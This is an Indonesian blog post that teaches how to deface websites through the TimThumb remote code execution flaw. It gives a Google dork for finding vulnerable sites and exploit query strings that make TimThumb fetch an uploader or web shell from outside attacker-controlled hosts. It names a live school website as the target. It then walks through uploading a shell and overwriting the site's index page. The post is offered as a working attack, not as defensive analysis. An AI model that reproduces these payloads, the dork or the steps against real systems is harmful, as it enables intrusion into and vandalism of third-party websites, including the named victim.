Tutorial deface Poc Timthumb RCE
December 08, 2018
Add Comment
Assalamualaikum wr.Wb
Balik lagi dengan saya kandol tamvans Tiada tara :v kali ini saya akan membagikan tutorial Deface Dengan Metode Timthumb RCE*
Pertama" Siapkan Dorknya Ama Exploitnya .. (Exploitnya Beda2 gan.. Kita Tinggal Liat
versinya dulu ya:<)..
versinya dulu ya:<)..
- Dork : inurl:timthumb.php?src= (selebihnya kembangin yah)
- Exploit :
?src=http://picasa.com.sp-exploiter.xyz/timthumb/a.php (uploader versi 1.9)
?src=http://picasa.com.sp-exploiter.xyz/timthumb/a.php (uploader versi 1.9)
?src=http://flickr.com.thanhnam102.com/M4ni4kCyberTeam.php (private shell versi 1.30)
?scr=http://flickr.com.x-groups.org/Nur.php (versi 1.20 kebawah)
Live Target :
http://mamnonsunrise.edu.vn
http://mamnonsunrise.edu.vn
Pertama kita dork dulu D
digoogle dulu :(
digoogle dulu :(
Berhubung ane udh ada targetnya langsung aja gan kita sikat :(..
Lah keluar versinya kan?? Kuy tinggal tambahkan Exploit 1.30
Kemudian kita copy mulai dari ./cache sampe php contohnya :
Kemudian pasti akan ada tempat Upload File
Pilih shell kalian dan Bummmmmmmm:*
Kemudian cari Index.html Atau Index.php... Trus kalian edit D
dan tumpuk dengan script deface kalian.. Dan Otomatis web sudah ketebas:v... Kalau kalian baik jangan lupa backup dulu indexnya,, Kasian adminnya :v,,,,
dan tumpuk dengan script deface kalian.. Dan Otomatis web sudah ketebas:v... Kalau kalian baik jangan lupa backup dulu indexnya,, Kasian adminnya :v,,,,
Cara nge cek vuln atau kaga tambahin timthumb.php di akhir url
Target.com/timthumb.php
atau thumbs.php
atau thumbs.php
salam *MR.CAK3R_14
Salaam *ALI Attacker*
Salaam *ALI Attacker*
0 Response to "Tutorial deface Poc Timthumb RCE"
Post a Comment